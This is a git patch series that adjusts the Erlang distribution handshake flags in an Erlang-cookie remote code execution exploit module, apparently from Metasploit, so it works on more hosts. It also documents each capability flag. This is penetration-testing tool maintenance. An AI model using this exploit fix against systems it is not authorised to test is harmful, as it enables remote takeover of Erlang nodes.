From 5742e1c20ea2561ed3265ede6cb7d5f7138864c7 Mon Sep 17 00:00:00 2001 From: Mike Brown Date: Wed, 1 Sep 2021 10:45:41 -0700 Subject: [PATCH 1/3] Add DFLAG_BIG_CREATION to capability flags I have been having trouble with this module (and other projects) using the included set of capability flags (0x3499c) on a specific host. I took some time to analyze the problem and it appears to be with the included flag set. In my case (and I suspect others'), the target node was rejecting the client with "not_allowed". After testing I found that simply adding DFLAG_BIG_CREATION (0x40000) allowed this exploit to work, both on the host I was having trouble with, and an older one where this (unmodified) exploit was working. Breakdown of flags is below. ``` 0x0007499c == 0b0000 0000 0111 0100 1001 1001 1100 | ||| | | | | | ||-- DFLAG_EXTENDED_REFERENCES | ||| | | | | | |-- DFLAG_DIST_MONITOR | ||| | | | | |-- DFLAG_FUN_TAGS | ||| | | | |-- DFLAG_NEW_FUN_TAGS | ||| | | |-- DFLAG_EXTENDED_PIDS_PORTS | ||| | |-- DFLAG_NEW_FLOATS | ||| |-- DFLAG_SMALL_ATOM_TAGS | |||-- DFLAG__UTF8_ATOMS | ||-- DFLAG_MAP_TAG | |-- **DFLAG_BIG_CREATION** |-- DFLAG_HANDSHAKE_23 ``` --- modules/exploits/multi/misc/erlang_cookie_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index 48d1b64ed013..20393314674b 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -141,7 +141,7 @@ def exploit send_name << [(@our_node.length+7).to_s(16)].pack('H*') # send_name << "\x6e" # Tag: n send_name << "\x00\x05" # Version: R6 (5) - send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c) + send_name << "\x00\x07\x49\x9c" # Flags (0x0003499c) send_name << "#{@our_node}" # @ # SEND_CHALLENGE_REPLY: return generated digest and its own challenge From 2bfc8d35d0954b7cea71514f5d10c6aa1ba9bc17 Mon Sep 17 00:00:00 2001 From: Mike Brown Date: Sat, 4 Sep 2021 14:32:30 -0700 Subject: [PATCH 2/3] Defined capability flags in comment Added descriptive comment for included capability flags. --- modules/exploits/multi/misc/erlang_cookie_rce.rb | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index 20393314674b..cf42a8c66da0 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -141,7 +141,17 @@ def exploit send_name << [(@our_node.length+7).to_s(16)].pack('H*') # send_name << "\x6e" # Tag: n send_name << "\x00\x05" # Version: R6 (5) - send_name << "\x00\x07\x49\x9c" # Flags (0x0003499c) + send_name << "\x00\x07\x49\x9c" # Flags (0x0007499c) + # DFLAG_EXTENDED_REFERENCES (0x4) + # DFLAG_DIST_MONITOR (0x8) + # DFLAG_FUN_TAGS (0x10) + # DFLAG_NEW_FUN_TAGS. (0x80) + # DFLAG_EXTENDED_PIDS_PORTS (0x100) + # DFLAG_NEW_FLOATS (0x800) + # DFLAG_SMALL_ATOM_TAGS (0x4000) + # DFLAG_UTF8_ATOMS (0x10000) + # DFLAG_MAP_TAG (0x20000) + # DFLAG_BIG_CREATION (0x40000) send_name << "#{@our_node}" # @ # SEND_CHALLENGE_REPLY: return generated digest and its own challenge From 28e358066b2c252f3dada67a1bdf3f0d16ce1ecf Mon Sep 17 00:00:00 2001 From: Mike Brown Date: Sat, 4 Sep 2021 14:34:05 -0700 Subject: [PATCH 3/3] Fixed typo Extraneous `.`. Thanks, macOS! --- modules/exploits/multi/misc/erlang_cookie_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index cf42a8c66da0..56ba8abaabf4 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -145,7 +145,7 @@ def exploit # DFLAG_EXTENDED_REFERENCES (0x4) # DFLAG_DIST_MONITOR (0x8) # DFLAG_FUN_TAGS (0x10) - # DFLAG_NEW_FUN_TAGS. (0x80) + # DFLAG_NEW_FUN_TAGS (0x80) # DFLAG_EXTENDED_PIDS_PORTS (0x100) # DFLAG_NEW_FLOATS (0x800) # DFLAG_SMALL_ATOM_TAGS (0x4000)